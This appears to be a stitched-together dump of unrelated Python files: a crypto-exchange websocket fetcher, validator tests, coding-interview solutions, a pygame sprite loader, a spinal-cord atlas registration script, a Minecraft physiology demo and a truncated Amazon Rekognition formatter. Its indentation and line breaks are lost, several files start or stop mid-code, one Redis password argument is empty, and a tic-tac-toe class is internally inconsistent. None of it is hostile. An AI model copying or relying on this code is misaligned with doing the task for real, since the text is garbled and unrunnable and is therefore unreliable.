spl_pt = selct_attr_gini_cont(data, class_label_column=4) # print(spl_attr, spl_pt) 0 #!/usr/bin/env python3 import os import sys import json import errno import matplotlib.pyplot as plt def main(): if len(sys.argv) < 2 or ("-h" in sys.argv) or ("--help" in sys.argv): print(f"Usage: {sys.argv[0]} ") print("Input:\n\ttext:json\n\t\t{ \"x\": [1,2,3,...], \"y\": [1,2,3,...] 
}\n\ttext:python array\n\t\t[1,2,3,...]\n") exit(0) data = [] arg = sys.argv[1] if os.path.isfile(arg): with open(arg, "r") as file: data = json.load(file) else: data = json.loads(arg) if isinstance(data, list): plt.plot(data) elif isinstance(data,dict) and ("x" in data) and ("y" in data): plt.plot(data["x"], data["y"]) else: exit(errno.EINVAL) plt.show() if __name__ == "__main__": main() ### This module uses websocket to fetch bitfinex 1-minute OHLCV data in real time import sys import random import logging import asyncio import json import redis import websockets from typing import Any, Iterable, NoReturn from common.config.constants import ( REDIS_HOST, REDIS_USER, REDIS_PASSWORD, REDIS_DELIMITER ) from common.utils.asyncioutils import AsyncLoopThread from fetchers.config.constants import ( WS_SUB_REDIS_KEY, WS_SERVE_REDIS_KEY, WS_SUB_LIST_REDIS_KEY, WS_RATE_LIMIT_REDIS_KEY ) from fetchers.config.queries import MUTUAL_BASE_QUOTE_QUERY from fetchers.rest.bitfinex import BitfinexOHLCVFetcher, EXCHANGE_NAME from fetchers.utils.ratelimit import AsyncThrottler from fetchers.utils.exceptions import ( UnsuccessfulConnection, ConnectionClosed, InvalidStatusCode ) # Bitfinex only allows up to 30 subscriptions per ws connection URI = "wss://api-pub.bitfinex.com/ws/2" MAX_SUB_PER_CONN = 25 BACKOFF_MIN_SECS = 2.0 BACKOFF_MAX_SECS = 60.0 class BitfinexOHLCVWebsocket: def __init__(self): self.redis_client = redis.Redis( host=REDIS_HOST, username=REDIS_USER, password=, decode_responses=True ) # Mapping from ws_symbol to symbol # and mapping from channel ID to symbol self.wssymbol_mapping = {} self.chanid_mapping = {} # Rest fetcher for convenience self.rest_fetcher = BitfinexOHLCVFetcher() # Logging self.logger = logging.getLogger(f'{EXCHANGE_NAME}_websocket') self.logger.setLevel(logging.INFO) log_handler = logging.StreamHandler() log_handler.setLevel(logging.INFO) log_formatter = logging.Formatter( '%(asctime)s - %(name)s - %(levelname)s - %(message)s') log_handler.setFormatter(log_formatter) self.logger.addHandler(log_handler) # Rate limit manager # Limit to attempt to connect every 3 secs self.rate_limiter = AsyncThrottler( WS_RATE_LIMIT_REDIS_KEY.format(exchange = EXCHANGE_NAME), 1, 3, redis_client = self.redis_client ) # Backoff self.backoff_delay = BACKOFF_MIN_SECS # Loop # self.loop_handler = AsyncLoopThread(daemon=None) # self.loop_handler.start() async def subscribe_one( self, symbol: str, ws_client: Any ) -> None: ''' Connects to WS endpoint for a symbol :params: `symbol`: string of symbol `ws_client`: websockets client obj ''' tsymbol = self.rest_fetcher.make_tsymbol(symbol) ws_symbol = f"trade:1m:{tsymbol}" self.wssymbol_mapping[ws_symbol] = symbol msg = {'event': 'subscribe', 'channel': 'candles', 'key': ws_symbol} await ws_client.send(json.dumps(msg)) async def subscribe(self, symbols: Iterable, i: int = 0) -> NoReturn: ''' Subscribes to Bitfinex WS for `symbols` :params: `symbols` list of symbols e.g., ['ETHBTC', 'BTCEUR'] ''' while True: try: # Delay before making a connection # async with self.rate_limiter: async with websockets.connect(URI, ping_interval=10) as ws: await asyncio.gather( *(self.subscribe_one(symbol, ws) for symbol in symbols)) self.logger.info(f"Connection {i}: Successful") self.backoff_delay = BACKOFF_MIN_SECS while True: resp = await ws.recv() respj = json.loads(resp) # If resp is dict, find the symbol using wssymbol_mapping # and then map chanID to found symbol # If resp is list, make sure its length is 6 # and use the mappings to find symbol and push to Redis if 
isinstance(respj, dict): if 'event' in respj: if respj['event'] == "subscribed": symbol = self.wssymbol_mapping[respj['key']] self.chanid_mapping[respj['chanId']] = symbol elif respj['event'] == "error": self.logger.error( f"Connection {i}: Subscription failed, raising exception") raise UnsuccessfulConnection elif isinstance(respj, list): if len(respj) == 2 and len(respj[1]) == 6: try: symbol = self.chanid_mapping[respj[0]] timestamp = int(respj[1][0]) open_ = respj[1][1] high_ = respj[1][3] low_ = respj[1][4] close_ = respj[1][2] volume_ = respj[1][5] sub_val = f'{timestamp}{REDIS_DELIMITER}{open_}{REDIS_DELIMITER}{high_}{REDIS_DELIMITER}{low_}{REDIS_DELIMITER}{close_}{REDIS_DELIMITER}{volume_}' # Setting Redis data for updating ohlcv psql db # and serving real-time chart # This Redis-update-ohlcv-psql-db-procedure # may be changed with a pipeline from fastAPI... base_id = self.rest_fetcher.symbol_data[symbol]['base_id'] quote_id = self.rest_fetcher.symbol_data[symbol]['quote_id'] ws_sub_redis_key = WS_SUB_REDIS_KEY.format( exchange = EXCHANGE_NAME, base_id = base_id, quote_id = quote_id, delimiter = REDIS_DELIMITER, ) ws_serve_redis_key = WS_SERVE_REDIS_KEY.format( exchange = EXCHANGE_NAME, base_id = base_id, quote_id = quote_id, delimiter = REDIS_DELIMITER ) # logging.info(f'ws sub redis key: {ws_sub_redis_key}') # logging.info(f'ws serve redis key: {ws_serve_redis_key}') # Add ws sub key to set of all ws sub keys # Set hash value for ws sub key # Replace ws serve key hash if this timestamp # is more up-to-date self.redis_client.sadd( WS_SUB_LIST_REDIS_KEY, ws_sub_redis_key) self.redis_client.hset( ws_sub_redis_key, timestamp, sub_val) current_timestamp = self.redis_client.hget( ws_serve_redis_key, 'time') if current_timestamp is None or \ timestamp >= int(current_timestamp): self.redis_client.hset( ws_serve_redis_key, mapping = { 'time': timestamp, 'open': open_, 'high': high_, 'low': low_, 'close': close_, 'volume': volume_ } ) except Exception as exc: self.logger.warning( f"Bitfinex WS Fetcher: EXCEPTION: {exc}") # Sleep to release event loop await asyncio.sleep(0.01) except (ConnectionClosed, InvalidStatusCode) as exc: self.logger.warning( f"Connection {i} raised exception: {exc} - reconnecting..." 
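                    # (added) reconnection below uses exponential backoff: sleep for
                    # at most BACKOFF_MAX_SECS, then grow the delay by a random factor
                    # between 1 and 2 before the next attempt.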
) await asyncio.sleep(min(self.backoff_delay, BACKOFF_MAX_SECS)) self.backoff_delay *= (1+random.random()) # add a random factor async def mutual_basequote(self) -> None: ''' Subscribes to WS channels of the mutual symbols among all exchanges ''' symbols_dict = self.rest_fetcher.get_symbols_from_exch(MUTUAL_BASE_QUOTE_QUERY) self.rest_fetcher.close_connections() # symbols = ["ETHBTC", "BTCEUR"] await asyncio.gather(self.subscribe(symbols_dict.keys())) async def all(self) -> None: # def all(self): ''' Subscribes to WS channels of all symbols ''' self.rest_fetcher.fetch_symbol_data() symbols = tuple(self.rest_fetcher.symbol_data.keys()) # TODO: probably running in different threads is not needed # for i in range(0, len(symbols), MAX_SUB_PER_CONN): # asyncio.run_coroutine_threadsafe( # self.subscribe(symbols[i:i+MAX_SUB_PER_CONN], i), # # self.coroutine(5, i), # self.loop_handler.loop # ) # Subscribe to `MAX_SUB_PER_CONN` per connection (e.g., 30) await asyncio.gather( *( self.subscribe(symbols[i:i+MAX_SUB_PER_CONN], int(i/MAX_SUB_PER_CONN)) for i in range(0, len(symbols), MAX_SUB_PER_CONN) ) ) def run_mutual_basequote(self) -> None: asyncio.run(self.mutual_basequote()) def run_all(self) -> None: asyncio.run(self.all()) # self.all() from src.validator import is_dir, is_file, is_extension, is_bool, is_in_range, is_positive_number def test_is_dir__boolean_should_return_false(): ret_val = is_dir(True) expected_val = False assert ret_val == expected_val def test_is_dir__filename_should_return_false(): ret_val = is_dir('tests/func/test_validator.py') expected_val = False assert ret_val == expected_val def test_is_dir__directory_should_return_true(): ret_val = is_dir('tests/func/') expected_val = True assert ret_val == expected_val def test_is_file__boolean_should_return_false(): ret_val = is_file(False) expected_val = False assert ret_val == expected_val def test_is_file__directory_should_return_false(): ret_val = is_file('tests/func/') expected_val = False assert ret_val == expected_val def test_is_file__filename_should_return_true(): ret_val = is_file('tests/func/test_validator.py') expected_val = True assert ret_val == expected_val def test_is_extension__boolean_should_return_false(): ret_val = is_extension(False) expected_val = False assert ret_val == expected_val def test_is_extension__without_dot_extension_should_return_false(): ret_val = is_extension('jpg') expected_val = False assert ret_val == expected_val def test_is_extension__dot_only_should_return_false(): ret_val = is_extension('.') expected_val = False assert ret_val == expected_val def test_is_extension__dot_plus_extension_should_return_true(): ret_val = is_extension('.jpg') expected_val = True assert ret_val == expected_val def test_is_bool__string_should_return_false(): ret_val = is_bool('True') expected_val = False assert ret_val == expected_val def test_is_bool__boolean_should_return_true(): ret_val = is_bool(False) expected_val = True assert ret_val == expected_val def test_is_in_range__string_num_should_return_false(): target = '3' min_num = 1 max_num = 5 exclude = False ret_val = is_in_range(target, min_num, max_num, exclude) expected_val = False assert ret_val == expected_val def test_is_in_range__minimum_num_should_return_false_when_exclude_option_is_true(): target = 1 min_num = 1 max_num = 5 exclude = True ret_val = is_in_range(target, min_num, max_num, exclude) expected = False assert ret_val == expected def test_is_in_range__maximum_num_should_return_false_when_exclude_option_is_true(): target = 5 min_num = 1 max_num = 
5 exclude = True ret_val = is_in_range(target, min_num, max_num, exclude) expected = False assert ret_val == expected def test_is_in_range__minimum_num_should_return_true_when_exclude_option_is_false(): target = 1 min_num = 1 max_num = 5 exclude = False ret_val = is_in_range(target, min_num, max_num, exclude) expected = True assert ret_val == expected def test_is_in_range__maximum_num_should_return_true_when_exclude_option_is_false(): target = 5 min_num = 1 max_num = 5 exclude = False ret_val = is_in_range(target, min_num, max_num, exclude) expected = True assert ret_val == expected def test_is_in_range__nearest_to_minimum_num_in_range_should_return_true_when_exclude_option_is_true(): target = 2 min_num = 1 max_num = 5 exclude = True ret_val = is_in_range(target, min_num, max_num, exclude) expected = True assert ret_val == expected def test_is_in_range__nearest_to_maximum_num_in_range_should_return_true_when_exclude_option_is_true(): target = 4 min_num = 1 max_num = 5 exclude = True ret_val = is_in_range(target, min_num, max_num, exclude) expected = True assert ret_val == expected def test_is_in_range__nearest_to_minimum_num_in_range_should_return_true_when_exclude_option_is_false(): target = 2 min_num = 1 max_num = 5 exclude = False ret_val = is_in_range(target, min_num, max_num, exclude) expected = True assert ret_val == expected def test_is_in_range__nearest_to_maximum_num_in_range_should_return_true_when_exclude_option_is_false(): target = 4 min_num = 1 max_num = 5 exclude = False ret_val = is_in_range(target, min_num, max_num, exclude) expected = True assert ret_val == expected def test_is_in_range__nearest_to_minimum_num_out_of_range_should_return_false_when_exclude_option_is_true(): target = 0 min_num = 1 max_num = 5 exclude = True ret_val = is_in_range(target, min_num, max_num, exclude) expected = False assert ret_val == expected def test_is_in_range__nearest_to_maximum_num_out_of_range_should_return_false_when_exclude_option_is_true(): target = 6 min_num = 1 max_num = 5 exclude = True ret_val = is_in_range(target, min_num, max_num, exclude) expected = False assert ret_val == expected def test_is_in_range__nearest_to_minimum_num_out_of_range_should_return_false_when_exclude_option_is_false(): target = 0 min_num = 1 max_num = 5 exclude = False ret_val = is_in_range(target, min_num, max_num, exclude) expected = False assert ret_val == expected def test_is_in_range__nearest_to_maximum_num_out_of_range_should_return_false_when_exclude_option_is_false(): target = 6 min_num = 1 max_num = 5 exclude = False ret_val = is_in_range(target, min_num, max_num, exclude) expected = False assert ret_val == expected def test_is_positive_number__string_should_return_false(): target = '10' ret_val = is_positive_number(target) expected = False assert ret_val == expected def test_is_positive_number__positive_number_should_return_true(): target = 1 ret_val = is_positive_number(target) expected = True assert ret_val == expected def test_is_positive_number__zero_should_return_false(): target = 0 ret_val = is_positive_number(target) expected = False assert ret_val == expected def test_is_positive_number__negative_number_should_return_false(): target = -1 ret_val = is_positive_number(target) expected = False assert ret_val == expected jrmsdev/hackerrank #!/usr/bin/env python3 from itertools import permutations s, n = input ().strip (). 
split () n = int (n) for p in permutations (sorted (s), n): print (''.join (p)) from editor_utils.error import atlas_error import sys import os _stdout = sys.stdout sys.stdout = open(os.devnull,'w') import pygame sys.stdout = _stdout del(_stdout) del(sys) del(os) class atlas: def __init__(self, atlas:str): #super().__init() try: self._atlas = pygame.image.load_basic(atlas) #self._atlas = pygame.image.fromstring(bytes.fromhex(atlas),(128,64),"P").convert() except ValueError as e: print(repr(e)) except pygame.error as e: print(repr(atlas_error(e))) @property def atlas(self): return self._atlas @atlas.setter def atlas(self, val): self._atlas = val @atlas.deleter def atlas(self): del(self._atlas) def load( self, multiplier:int, colorkey=(0,0,0,255) ): sprites = [] flags = pygame.RLEACCEL for row in range(8): for item in range(16): # removed depth 8 for the map editor to look RIGHT spr = pygame.Surface((8,8))#,depth=8) spr.blit(self.atlas,(0,0),(item*8,row*8,8,8)) spr_scaled = pygame.transform.scale(spr,(8*multiplier,8*multiplier)) spr_scaled.convert(8) spr_scaled.set_colorkey(colorkey,flags) sprites.append(spr_scaled) del(spr) del(spr_scaled) #del(spr_size) return [sprites[index] for index,spr in enumerate(sprites,start=0)] """ class atlas2: def __init__(self, atlas:str): #super().__init() try: self._atlas = pygame.image.load_basic(atlas) #self._atlas = pygame.image.fromstring(bytes.fromhex(atlas),(128,64),"P").convert() except ValueError as e: print(repr(e)) except pygame.error as e: print(repr(atlas_error(e))) @property def atlas(self): return self._atlas @atlas.setter def atlas(self, val): self._atlas = val @atlas.deleter def atlas(self): del(self._atlas) def load( self, multiplier:int, colorkey=(0,0,0,255) ): sprites = [] flags = pygame.RLEACCEL for row in range(8): for item in range(16): spr = pygame.Surface((8,8),depth=8) spr.blit(self.atlas,(0,0),(item*8,row*8,8,8)) spr_scaled = pygame.transform.scale(spr,(8*multiplier,8*multiplier)) spr_scaled.convert(8) spr_scaled.set_colorkey(colorkey,flags) sprites.append(spr_scaled) del(spr) del(spr_scaled) #del(spr_size) return [sprites[index] for index,spr in enumerate(sprites,start=0)] flags = pygame.RLEACCEL scaled_atlas = pygame.transform.scale(self.atlas,(128*multiplier,64*multiplier)) scaled_atlas.convert(8) scaled_atlas.set_colorkey(colorkey,flags) return scaled_atlas """ """class atlas(object): def __init__(self,atlas): self.sprites:list = [] # can take a path, or bytes / buffer / etc. self._atlas = atlas @property def atlas(self): return self._atlas @atlas.setter def atlas(self,value) -> None: self._atlas = value @atlas.deleter def atlas(self): del(self._atlas) def load_atlas(self): if type(self.atlas)==bytes: # format is P which means 8 bit. unfortunately pygame # won't do 4 bit which is the truth of the pico8 img = pygame.image.frombuffer(self.atlas,(128,64),"P") elif type(self.atlas)==str: try: img = pygame.image.fromstring(bytes.fromhex(self.atlas)) except TypeError: img = pygame.image.load_basic(self.atlas) else: #raise atlas_error(f"""#Unable to load data type {str(type(self.atlas))}. 
# Must be either file path (string) or bytes.""") # loop through every image in the atlas # -- the atlas is automatically assumed to be 128x64 -- #for row in range(8): # for sprite in range(16): # pass #@property #def gfx(self): # return self.sprites #@gfx.setter #def gfx(self,value): # self.sprites = value #@gfx.deleter #def gfx(self): # del(self.sprites) #def kill(self): # del(self)""" grokking-the-coding-interview/top-k-elements/Frequency-Stack-(hard).py """ LC 895 Design a class that simulates a Stack data structure, implementing the following two operations: push(int num): Pushes the number ‘num’ on the stack. pop(): Returns the most frequent number in the stack. If there is a tie, return the number which was pushed later. Example: After following push operations: push(1), push(2), push(3), push(2), push(1), push(2), push(5) 1. pop() should return 2, as it is the most frequent number 2. Next pop() should return 1 3. Next pop() should return 2 """ from heapq import * class FrequencyStack: def __init__(self): # the i-th occurrences are saved in the same stack # if i is a key (i > 1), then i - 1 is also a key self.f2stack = {} self.n2freqs = {} self.max = -float('inf') def push(self, num): if num in self.n2freqs: self.n2freqs[num] += 1 else: self.n2freqs[num] = 1 self.max = max(self.max, self.n2freqs[num]) if self.n2freqs[num] in self.f2stack: self.f2stack[self.n2freqs[num]].append(num) else: self.f2stack[self.n2freqs[num]] = [num] def pop(self): n = self.f2stack[self.max].pop() self.n2freqs[n] -= 1 if not self.n2freqs[n]: del self.n2freqs[n] if not self.f2stack[self.max]: del self.f2stack[self.max] self.max -= 1 return n def main(): # 2 1 2 5 3 2 frequencyStack = FrequencyStack() frequencyStack.push(1) frequencyStack.push(2) frequencyStack.push(3) frequencyStack.push(2) frequencyStack.push(1) frequencyStack.push(2) frequencyStack.push(5) print(frequencyStack.pop()) print(frequencyStack.pop()) print(frequencyStack.pop()) print(frequencyStack.pop()) print(frequencyStack.pop()) print(frequencyStack.pop()) main() """ Time O(1) Space O(N) """ gvvynplaine/numpy import sys import pytest import numpy as np def test_financial_expired(): if sys.version_info[:2] >= (3, 7): match = 'NEP 32' else: match = None with pytest.raises(AttributeError, match=match): np.fv ml_source/src/blocktorch/blocktorch/utils/__init__.py """Utility methods.""" from .logger import get_logger, log_subtitle, log_title from .gen_utils import ( classproperty, import_or_raise, convert_to_seconds, get_random_state, get_random_seed, SEED_BOUNDS, jupyter_check, safe_repr, drop_rows_with_nans, pad_with_nans, _get_rows_without_nans, save_plot, is_all_numeric, get_importable_subclasses, _rename_column_names_to_numeric, deprecate_arg, ) from .cli_utils import ( get_blocktorch_root, get_installed_packages, get_sys_info, print_deps, print_info, print_sys_info, ) from .woodwork_utils import ( _retain_custom_types_and_initalize_woodwork, infer_feature_types, _convert_numeric_dataset_pandas, ) 0 #!/usr/bin/env python ######################################################################################### # # Register AMU_wm atlas to the PAM_cord segmentation, and also add missing slices at the top and bottom. 
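# In outline (see the code below): the WM and GM atlases are extended along z to
# cover the full cord mask, summed and binarised, cropped for speed, registered to
# the cord (slice-wise affine, then bsplinesyn), and the resulting warp is applied
# to the extended WM atlas; the result is cropped and renamed to PAM50_wm.nii.gz.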
# # --------------------------------------------------------------------------------------- # Copyright (c) 2016 Polytechnique Montreal # Author: # Created: 2016-08-26 # # About the license: see the file LICENSE.TXT ######################################################################################### #TODO: regularize transformations across z # Import common Python libraries import sys, io, os import numpy as np # append path that contains scripts, to be able to load modules path_script = os.path.dirname(__file__) # Get path of the toolbox path_sct = os.environ.get("SCT_DIR", os.path.dirname(os.path.dirname(__file__))) sys.path.append(os.path.join(path_sct, 'scripts')) import sct_utils as sct from msct_image import Image # parameters fname_wm = os.path.join(path_sct, "PAM50", "template", "PAM50_wm.nii.gz") fname_gm = os.path.join(path_sct, "PAM50", "template", "PAM50_gm.nii.gz") fname_cord = os.path.join(path_sct, "PAM50", "template", "PAM50_cord.nii.gz") # create temporary folder path_tmp = sct.tmp_create() # go to temp folder os.chdir(path_tmp) # open volumes im_wm = Image(fname_wm) data_wm = im_wm.data im_gm = Image(fname_gm) data_gm = im_gm.data im_cord = Image(fname_cord) data_cord = im_cord.data dim = im_cord.dim # sum wm/gm data_wmgm = data_wm + data_gm # get min/max z slices from wm/gm zsum = np.sum(np.sum(data_wmgm, 0), 0) zmin_wm = np.min(np.nonzero(zsum)) zmax_wm = np.max(np.nonzero(zsum)) # get min/max z slices from cord zsum = np.sum(np.sum(data_cord, 0), 0) zmin_cord = np.min(np.nonzero(zsum)) zmax_cord = np.max(np.nonzero(zsum)) # duplicate WM and GM atlas towards the top and bottom slices to match the cord template # bottom slices for iz in range(zmin_cord, zmin_wm): data_wm[:, :, iz] = data_wm[:, :, zmin_wm] data_gm[:, :, iz] = data_gm[:, :, zmin_wm] # top slices for iz in range(zmax_wm, zmax_cord): data_wm[:, :, iz] = data_wm[:, :, zmax_wm] data_gm[:, :, iz] = data_gm[:, :, zmax_wm] # save modified atlases im_wm.setFileName('wm_ext.nii.gz') im_wm.data = data_wm im_wm.save() im_gm.setFileName('gm_ext.nii.gz') im_gm.data = data_gm im_gm.save() # sum modified wm/gm data_wmgm = data_wm + data_gm # save wm/gm im_wm.setFileName('wmgm_ext.nii.gz') im_wm.data = data_wmgm im_wm.save() # register wmgm --> cord sct.run('cp '+fname_cord+' cord.nii.gz') # sct.run('sct_maths -i '+fname_cord+' -laplacian 1 -o cord.nii.gz') sct.run('sct_maths -i wmgm_ext.nii.gz -bin 0.5 -o wmgm_ext.nii.gz') # crop for faster registration sct.run('sct_crop_image -i cord.nii.gz -start 40,40,40 -end 100,100,990 -dim 0,1,2 -o cord_crop.nii.gz') sct.run('sct_crop_image -i wmgm_ext.nii.gz -start 40,40,40 -end 100,100,990 -dim 0,1,2 -o wmgm_ext_crop.nii.gz') # sct.run('sct_maths -i wmgm_ext.nii.gz -laplacian 1 -o wmgm_ext.nii.gz') #sct.run('sct_register_multimodal -i wmgm_ext.nii.gz -d cord.nii.gz -iseg wmgm_ext.nii.gz -dseg cord.nii.gz -param step=1,type=im,algo=bsplinesyn,iter=10,slicewise=1,metric=MeanSquares -x linear -r 0') sct.run('sct_register_multimodal -i wmgm_ext_crop.nii.gz -d cord_crop.nii.gz -param step=1,type=im,algo=affine,iter=100,slicewise=1,metric=MeanSquares,smooth=1:step=2,type=im,algo=bsplinesyn,iter=5,slicewise=0,metric=MeanSquares,smooth=0 -x linear -r 0') sct.run('sct_apply_transfo -i wm_ext.nii.gz -d cord.nii.gz -w warp_wmgm_ext2cord.nii.gz -x linear') # regularize along S-I direction # symmetrize # crop below a certain point sct.run('sct_crop_image -i wm_ext_reg.nii.gz -dim 2 -start 0 -end 990 -b 0 -o wm_ext_reg_crop.nii.gz') # rename new file sct.run('mv wm_ext_reg_crop.nii.gz 
PAM50_wm.nii.gz') # go back to previous folder #os.chdir('../') """ World Ended ========= A way in which the world terminates. """ from typing import Callable from dataclasses import dataclass @dataclass class WorldEnded(World): name: str condition: Callable[..., bool] end_state: EndState def states(self): pass def tictactoe_no_more_spaces(self): return all(block.state == TicTacToe_Block.Empty for block in self.blocks) def tictactoe_white_won(self): return any(self.three_in_a_row().all_white()) def tictactoe_black_won(self): return any(self.three_in_a_row().all_black()) TicTacToe_Full = WorldEnded("No more spaces.", TicTacToe_EndState.Draw) cheapjack/StasisCraft0 #!/usr/bin/python #Install the modules we need #from pyfirmata import Arduino, util, INPUT from mcpi import minecraft from mcpi import minecraftstuff from time import sleep import server import serial # Use the command /getpos or F3 in Minecraft client to find out where you are then use those # x, y, z coordinates to build things # translate mc coords for mcpi ones # add this to x mcx = 177 # - this from y mcy = 64 # - this from z mcz = 135 # Connect to the server we use the imported server.py to make it work with CloudMaker mc = minecraft.Minecraft.create(server.address) #Post a message to the minecraft chat window mc.postToChat("Ready to read Dermis Temperature 1!") dermisfull = False dermisfull2 = False dermisfull3 = False # Text Bubble 1 # use `/js blocktype("My\nMessage", blocktypenumbercode) to build text and note \n represents a new line def MemoryCloud1(startx,starty,startz, chartwidth, chartheight, chartdepth, blocktype, blockid): # Main Bubble mc.setBlocks((startx + mcx), (starty-mcy), (startz-mcz), (startx + mcx) + chartwidth, (starty-mcy) + chartheight, (startz - mcz) + chartdepth, blocktype, blockid) # inset bottom mc.setBlocks((startx + mcx) + 1, (starty-mcy) - 1, (startz-mcz), (startx + mcx) + (chartwidth-1), (starty-mcy) -1, (startz - mcz) + chartdepth, blocktype, blockid) #inset top mc.setBlocks((startx + mcx) + 1, (starty-mcy) + (chartheight + 1), (startz-mcz), (startx + mcx) + (chartwidth-1), (starty-mcy) + (chartheight + 1), (startz - mcz) + chartdepth, blocktype, blockid) # define a barchart function def DermisTemperatureBlock(startx, starty, startz, dermiswidth, dermisheight, blocktype, blockid): # Make a stage mc.setBlocks((startx + mcx) - 2, (starty-mcy), (startz-mcz) - 2, (startx + mcx) + (dermiswidth + 2), (starty-mcy), (startz - mcz) + (dermiswidth + 2), blocktype, blockid) # Make glass walls mc.setBlocks((startx + mcx) - 1, (starty-mcy), (startz-mcz) - 1, (startx + mcx) + dermiswidth + 1, (starty-mcy) + dermisheight, (startz - mcz) + 1 + dermiswidth, 20) # Hollow inside of walls mc.setBlocks((startx + mcx), (starty-mcy), (startz-mcz), (startx + mcx) + dermiswidth, (starty-mcy) + dermisheight, (startz - mcz) + dermiswidth, 0) #Take off the 'lid' mc.setBlocks((startx + mcx), (starty-mcy)+dermisheight, (startz-mcz), (startx + mcx) + dermiswidth, (starty-mcy) + dermisheight, (startz - mcz) + (dermiswidth), 0) # Make an underfloor light mc.setBlocks((startx + mcx) - 1, (starty-mcy) - 1, (startz-mcz) - 1, (startx + mcx) + dermiswidth + 1, (starty-mcy) - 1, (startz - mcz) + dermiswidth + 1, 89) mc.setBlocks((startx + mcx), (starty-mcy) - 1, (startz-mcz), (startx + mcx) + dermiswidth, (starty-mcy) - 1, (startz - mcz) + (dermiswidth), blocktype, blockid) def HairDown(startx, starty, startz, hairheight, blocktype, blockid): mc.setBlocks((startx + mcx), (starty-mcy), (startz-mcz), (startx + mcx) + hairheight, 
(starty-mcy), (startz - mcz), blocktype, blockid) mc.setBlocks((startx + mcx), (starty-mcy), (startz-mcz), (startx + mcx), (starty-mcy) + hairheight, (startz - mcz), 0) def HairUp(startx, starty, startz, hairheight, blocktype, blockid): mc.setBlocks((startx + mcx), (starty-mcy), (startz-mcz), (startx + mcx) + hairheight, (starty-mcy), (startz - mcz), 0) mc.setBlocks((startx + mcx), (starty-mcy), (startz-mcz), (startx + mcx), (starty-mcy) + hairheight, (startz - mcz), blocktype, blockid) def VasoDilate(startx, starty, startz, dilation, blocktype, blockid): mc.setBlocks((startx + mcx), (starty-mcy), (startz-mcz), (startx + mcx) + 20, (starty-mcy), (startz - mcz) - dilation , blocktype, blockid) def VasoConstrict(startx, starty, startz, dilation, blocktype, blockid): mc.setBlocks((startx + mcx), (starty-mcy), (startz-mcz), (startx + mcx) + 20, (starty-mcy), (startz - mcz) - 4 , 35, 2) mc.setBlocks((startx + mcx), (starty-mcy), (startz-mcz)-1, (startx + mcx) + 20, (starty-mcy), (startz - mcz) - dilation , blocktype, blockid) # Gonna make you sweat def Sweat(startx, starty, startz, sweatheight, blocktype): mc.setBlocks((startx + mcx), (starty-mcy), (startz-mcz), (startx + mcx), (starty-mcy) + sweatheight, (startz - mcz), blocktype) def NoSweat(startx, starty, startz, sweatheight, blocktype): mc.setBlocks((startx + mcx), (starty-mcy), (startz-mcz), (startx + mcx), (starty-mcy) + sweatheight, (startz - mcz), 0) # Hair Response def DermisListener1(startx, starty, startz, dermisno): global dermisfull #Listen for blocks filling up leve blockType = mc.getBlock((startx + mcx), (starty - mcy), (startz - mcz), 1) if blockType != 0: print "It's really hot in SkinTemp ", dermisno, blockType sleep(0.5) #print "1st", dermisfull #mc.postToChat("WARNING! Dermis Sensor" + str(dermisno) + " is full!") HairDown(394, 89, -1150, 20, 35, 12) if not dermisfull: mc.postToChat("WARNING! Dermis Sensor" + str(dermisno) + " is full!") mc.postToChat("Triggering dermis Hair response") mc.postToChat("Hypothalamus you need to reduce temperature!") mc.postToChat("Hypothalamus, direct your response team!") sleep(0.5) HairDown(394, 89, -1150, 20, 35, 12) sleep(0.5) dermisfull = True #print "2nd", dermisfull else: if dermisfull: HairUp(394, 89, -1150, 20, 35, 12) print "Nothing from " + str(dermisno) dermisfull = False #print dermisFull sleep(5) # Vascular Dilation def DermisListener2(startx, starty, startz, dermisno): global dermisfull2 #Listen for blocks filling up level blockType = mc.getBlock((startx + mcx), (starty - mcy), (startz - mcz)) if blockType != 0: print "It's really hot in SkinTemp " , dermisno, blockType sleep(0.5) #print "1st", dermisfull2 #mc.postToChat("WARNING! Dermis Sensor" + str(dermisno) + " is full!") VasoDilate(393, 87, -1161, 4, 35, 14) #HairUp(394, 89, -1150, 20, 35, 12) if not dermisfull2: mc.postToChat("WARNING! 
Dermis Sensor" + str(dermisno) + " is full!") mc.postToChat("Hypothalamus you need to reduce temperature!") sleep(0.5) VasoDilate(393, 87, -1161, 4, 35, 14) sleep(0.5) dermisfull2 = True #print "2nd", dermisfull2 else: if dermisfull2: #HairDown(394, 89, -1150, 20, 35, 12) VasoConstrict(393, 87, -1161, 2, 35, 14) print "Nothing from " + str(dermisno) dermisfull2 = False #print dermisFull2 sleep(5) # Build First blocks # The MemoryCloud needs more x and less z to centre it # Overwrite Memory Text #MemoryCloud1(288, 105, -1164, 20, 12, 2, 35, 8) DermisTemperatureBlock(285, 89, -1160, 4, 10, 35, 4) # Second block #MemoryCloud1(334, 105, -1164, 20, 12, 2, 35, 6) DermisTemperatureBlock(332, 89, -1160, 4, 10, 35, 4) # Draw window into epidermis to observe vaso-dilation VasoDilate(393, 88, -1161, 4, 20, 0) # Draw a sweat example #Sweat(399, 84, -1176, 5, 8) #Main Loop while True: #Make a DermisListeners() and listen #arguments are startx, starty, startz, dermiswidth, dermisheight, dermisno # with the same width and thickness as the corresponding DermisTemperatureBlocks # SkinTemp 1 Hair Response #DermisListener1(285, 89, -1160, 1) DermisListener1(287, 99, -1158, 1) # Skin Temp2 Vascular system response DermisListener2(334, 99, -1158, 2) #DermisListener2(332, 99, -1155, 4, 10, 1) #DermisListener3(332, 89, -1160, 4, 10, 2) #while True: # Remember your chart is (x_coord, x_coord, x_coord, chartwidth, dermisheight, block block id(usually 0)) # TemperatureChart1(394, 68, -326, 2, 40, 35, 5) #TemperatureChart2(394, 68, -318, 2, 40, 35, 4) #TemperatureChart3(394, 68, -310, 2, 40, 35, 4) #TemperatureChart4(394, 68, -302, 2, 40, 35, 4) #TemperatureChart5(394, 68, -294, 2, 40, 35, 4) print "stopped" dataiku/dss-plugin-amazon-rekognition1-10 # -*- coding: utf-8 -*- """Module with classes to format Amazon Rekognition API results - extract meaningful columns from the API JSON response - draw bounding boxes """ from typing import Dict, List from enum import Enum from PIL import Image from fastcore.utils import store_attr from api_image_formatting import ImageAPIResponseFormatterMeta from plugin_io_utils import generate_unique, safe_json_loads from image_utils import auto_rotate_image, draw_bounding_box_pil_image # ============================================================================== # CONSTANT DEFINITION # ============================================================================== class UnsafeContentCategoryLevelEnum(Enum): TOP = "Top-level (simple)" SECOND = "Second-level (detailed)" class UnsafeContentCategoryTopLevelEnum(Enum): EXPLICIT_NUDITY = "Explicit Nudity" SUGGESTIVE = "Suggestive" VIOLENCE = "Violence" VISUALLY_DISTURBING = 